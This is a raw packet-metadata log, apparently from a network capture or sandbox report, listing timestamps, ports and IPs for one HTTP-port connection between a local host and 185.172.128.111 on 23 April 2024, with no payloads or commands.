Apr 23, 2024 09:27:11.486010075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.486010075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.486080885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.486082077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.691920996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.691986084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692008018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692028999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692054033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692089081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692148924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692205906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692236900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692240953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692256927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692274094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692291021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692297935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692308903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692325115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692327023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692343950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692359924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692359924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692377090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692385912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692394018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692409992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692425013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.692430973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692447901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.692471027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898149014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898183107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898199081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898214102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898235083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898250103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898267031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898282051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898298979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898315907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898330927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898345947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898360968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898375988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898391008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898406982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898432970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898437023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898437977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898437977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898437977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898449898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898467064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898483992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898493052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898493052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898500919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898509026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898545980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898565054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898581982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898601055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898614883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898616076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898633003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898648977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898653030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898665905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898683071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898685932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898699999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898708105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898715973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898729086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898735046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898752928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898763895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898768902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898787975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.898803949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.898828983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:12.619091988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:12.619092941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:12.825010061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:12.825064898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.136277914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.136359930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.312385082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.518230915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.624871016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.624886990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.624897957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.624939919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.624985933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.626974106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.832545996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.939325094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.939377069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:13.939527035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.939527035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.978750944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:13.978750944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:14.184545040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:14.184592009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:14.445028067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:14.445238113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:14.460396051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:14.460396051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:14.666023970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:14.666042089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:14.878384113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:14.878464937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:14.890016079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:14.890048027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:15.095578909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:15.095617056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:15.405318975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:15.405388117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:15.412458897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:15.412504911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:15.618077993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:15.618138075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:15.996154070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:15.996380091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.002700090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.002700090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.208488941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:16.208502054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:16.557554960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:16.557660103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.563255072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.563338041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.768912077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:16.768963099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:16.975718975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:16.977893114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.984859943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:16.984859943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:17.190471888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:17.190521955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:17.559875011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:17.560067892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:17.570638895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:17.570638895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:17.777455091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:17.777487040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:18.026632071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:18.026738882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:18.032757044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:18.032757998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:18.238331079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:18.238357067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:18.570127010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:18.570203066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:18.587354898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:18.587399006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:18.793008089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:18.793066025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.062275887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.062392950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:19.077807903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:19.077842951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:19.283507109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.283560038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.529674053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.529844999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:19.534996033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:19.535033941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:19.744859934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.744889975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.982554913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:19.982633114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.025444031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.025484085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.231065035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:20.231105089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:20.539647102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:20.539892912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.543704987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.543787956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.749500990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:20.749545097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:20.990396023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:20.990581989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.996401072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:20.996401072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:21.202080965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:21.202230930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:21.511964083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:21.512209892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:21.517654896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:21.517654896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:21.723695993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:21.723736048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:21.933883905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:21.933974028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:21.939445972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:21.939471006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:22.145152092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:22.145195007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:22.384622097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:22.384793997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:22.389317036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:22.389400005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:22.595036983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:22.595072985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:22.835299015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:22.835565090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:22.841672897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:22.841674089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.047314882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.047355890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.294435978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.294841051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.300975084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.301059008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.506624937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.506680012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.720346928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.720529079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.727741957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.727741957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:23.934685946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:23.934729099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:24.196125984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:24.196266890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:24.205318928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:24.205318928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:24.410940886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:24.411031961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:24.646919012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:24.647133112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:24.654324055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:24.654325008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:24.860121012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:24.860165119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:25.115422010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:25.115667105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:25.121223927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:25.121252060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:25.326977968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:25.327022076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:25.590645075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:25.590794086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:25.597265005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:25.597265005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:25.803056002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:25.803097010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.074754953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.074845076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.084469080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.084507942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.290056944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.290102005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.526983976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.527065992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.531729937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.531769991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.737369061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.737410069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.737446070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.985007048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:26.985296011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.990128040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:26.990128994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:27.195730925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:27.195770979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:27.469919920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:27.470165968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:28.501147032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:28.501147032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:28.707020998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:28.707067013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.021476984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.021687031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.026726007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.026766062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.233392954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.233434916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.496275902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.496381044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.501514912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.501605034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.707205057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.707247019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.989531994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:29.989655018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.995634079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:29.995666981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:30.201214075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.201257944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.201292038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.448621988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.448812008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:30.455625057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:30.455626011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:30.661341906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.661381960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.916188955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:30.916306019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:30.921828985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:30.921869993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:31.127475023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:31.127530098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:31.392280102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:31.392416954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:31.398389101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:31.398437977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:31.604783058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:31.604840040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:31.858278990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:31.858407974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:31.872809887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:31.872853994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.079659939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.079705000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.292371988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.292469025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.312380075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.518100977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.647715092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.647793055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.732286930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.732547998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.732707977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.732770920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938070059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938119888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938169956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938201904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938221931 CEST	49730	80	192.168.2.4	185.172.128.111
